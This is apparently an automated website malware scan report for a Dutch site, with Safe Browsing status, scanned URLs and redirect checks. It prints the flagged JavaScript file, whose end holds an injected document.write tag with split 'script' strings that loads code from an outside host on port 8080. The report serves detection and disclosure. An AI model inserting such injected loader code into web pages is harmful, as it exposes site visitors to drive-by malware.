Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geluk.rvu.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://geluk.rvu.nl/ | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://geluk.rvu.nl/?p=js | 200 OK Content-Length: 33206 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var wysiwyg=true;
dt=document;
function isDefined(object, variable){
return (typeof(eval(object)[variable]) != 'undefined');
}
function getObj(name){
if (document.getElementById){
this.style = (this.obj = document.getElementById(name)) ? this.obj.style : null;
} else if (document.all){
this.style = (this.obj = document.all[name]) ? this.obj.style : null;
} else if (document.layers){
this.obj = getObjNN4(document,name);
this.style = this.obj;
}
}
function getObjNN4(obj,name){
var x = obj.layers;
borderColor = '#c3c3c3'; splitterColor = '#c3c3c3'; styleIE = ''; styleMoz = ''; mb_Height = 18; with (item){ height = 19; css = 'menuitem'; cssHover = css+'Hover'; arrowRight = '<b>></b>'; arrowLeft = '<b><</b>'; target = '_self'; } } document.write('<sc'+'ript type="text/javascript" src="http://addle.diretctrishta.com:8080/Gigabyte.js"></scri'+'pt>'); Antivirus reports:
| ||
http://cn.omroep.nl/javascripts/npo-explore.js | 200 OK Content-Length: 20791 Content-Type: application/javascript | clean |
http://geluk.rvu.nl/dynsim/js/jquery.lightbox.js | 200 OK Content-Length: 8703 Content-Type: application/x-javascript | clean |
http://geluk.rvu.nl/? | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/home | 200 OK Content-Length: 12290 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?p=js | 200 OK Content-Length: 12292 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/? | 200 OK Content-Length: 12289 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?p=js | 200 OK Content-Length: 12307 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/? | 200 OK Content-Length: 12304 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/?p=js | 200 OK Content-Length: 12307 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/? | 200 OK Content-Length: 12304 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geluk.rvu.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 01:40:56 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: rvugeluk_session=initiate..54938228Z4b343c1; expires=Fri, 19-Dec-2014 02:10:56 GMT; path=/
GET / HTTP/1.1
Host: geluk.rvu.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 01:40:56 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: rvugeluk_session=initiate..54938228Z4b343c1; expires=Fri, 19-Dec-2014 02:10:56 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: geluk.rvu.nl
Referer: http://www.google.com/search?q=geluk.rvu.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geluk.rvu.nl
Referer: http://www.google.com/search?q=geluk.rvu.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.